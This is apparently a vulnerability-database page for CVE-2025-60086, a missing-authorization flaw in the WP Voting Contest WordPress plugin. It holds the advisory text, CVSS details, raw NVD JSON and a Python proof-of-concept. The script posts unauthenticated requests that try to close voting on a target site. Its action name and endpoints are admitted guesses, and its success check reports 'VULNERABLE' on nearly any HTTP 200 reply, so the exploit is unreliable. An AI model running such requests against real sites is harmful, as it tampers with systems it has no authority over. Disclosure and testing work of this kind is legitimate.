Security Vulnerability Report
中文
CVE-2025-60086 CVSS 7.5 HIGH

CVE-2025-60086

Published: 2025-12-18 08:16:09
Last Modified: 2026-04-27 16:16:32

Description

Missing Authorization vulnerability in Matt WP Voting Contest wp-voting-contest allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Voting Contest: from n/a through <= 5.8.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

WP Voting Contest <= 5.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60086 PoC - Missing Authorization in WP Voting Contest # This PoC demonstrates the broken access control vulnerability import requests import sys TARGET_URL = "http://target-wordpress-site.com" # Replace with actual vulnerable endpoint based on plugin version VULNERABLE_ENDPOINTS = [ "/wp-admin/admin-ajax.php", "/wp-admin/admin.php?page=wp-voting-contest" ] def test_unauthorized_access(): """ Test if unauthorized users can access voting management functions """ print("[*] Testing CVE-2025-60086 - Missing Authorization in WP Voting Contest") print(f"[*] Target: {TARGET_URL}") # Test without authentication session = requests.Session() # Try to access admin functions without being logged in for endpoint in VULNERABLE_ENDPOINTS: url = f"{TARGET_URL}{endpoint}" print(f"\n[*] Testing endpoint: {url}") # Common vulnerable actions in voting plugins test_data = { "action": "wp_voting_save_config", # Example action name "nonce": "", # May not be properly validated "voting_status": "closed" } try: response = session.post(url, data=test_data, timeout=10) # Check if we get admin-level response without auth if response.status_code == 200: # Check for signs of successful unauthorized access if "success" in response.text.lower() or response.status_code == 200: print(f"[!] VULNERABLE: Endpoint {endpoint} accessible without authorization") print(f"[!] Response preview: {response.text[:200]}") return True else: print(f"[-] Endpoint returned status: {response.status_code}") except requests.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] Testing complete. Manual verification recommended.") return False if __name__ == "__main__": test_unauthorized_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60086", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:08.827", "lastModified": "2026-04-27T16:16:32.180", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Matt WP Voting Contest wp-voting-contest allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Voting Contest: from n/a through <= 5.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-voting-contest/vulnerability/wordpress-wp-voting-contest-plugin-5-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}